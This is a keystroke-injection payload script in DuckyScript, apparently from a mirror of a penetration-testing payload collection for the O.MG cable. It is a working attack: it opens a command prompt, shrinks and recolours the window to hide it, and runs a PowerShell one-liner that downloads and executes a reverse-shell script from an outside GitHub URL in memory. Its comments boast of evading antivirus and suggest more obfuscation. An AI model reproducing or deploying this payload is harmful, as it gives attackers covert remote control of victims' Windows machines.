mirror of https://github.com/hak5/omg-payloads.git
37 lines
1.4 KiB
Plaintext
37 lines
1.4 KiB
Plaintext
|
REM #############################################################################################################
|
||
|
|
REM # This script is designed to get a reverse shell in Windows enviroments #
|
||
|
|
REM # with a one liner powershell command, this bypasses almost all antivirus out there and executes in memory. #
|
||
|
|
REM # To use it, just clone the reverse shell, change the IP, load it into the OMG cable and wait for nc. #
|
||
|
|
REM # You can even ofuscate the powershell with Invoke-Obfuscation and pyfuscation to make it even more #
|
||
|
|
REM # undetectable. #
|
||
|
|
REM # Script made by Hug1nn_ #
|
||
|
|
REM #############################################################################################################
|
||
|
|
|
||
|
|
GUI r
|
||
|
|
DELAY 500
|
||
|
|
REM @@ Opening CMD
|
||
|
|
STRING cmd.exe
|
||
|
|
ENTER
|
||
|
|
DELAY 200
|
||
|
|
REM @@ Minimizing the CMD to ofuscate it
|
||
|
|
STRING mode con:cols=18 lines=1
|
||
|
|
ENTER
|
||
|
|
DELAY 200
|
||
|
|
REM @@ Chaging the color
|
||
|
|
STRING color FE
|
||
|
|
ENTER
|
||
|
|
DELAY 200
|
||
|
|
REM @@ Executing the shell in memory
|
||
|
|
STRING powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/Hug1n/reverse_shells/main/minrev.ps1')"
|
||
|
|
ENTER
|
||
|
|
DELAY 200
|
||
|
|
REM @@ Minimizing
|
||
|
|
ALT SPACE
|
||
|
|
DOWNARROW
|
||
|
|
DELAY 200
|
||
|
|
DOWNARROW
|
||
|
|
DELAY 200
|
||
|
|
DOWNARROW
|
||
|
|
DELAY 200
|
||
|
|
ENTER
|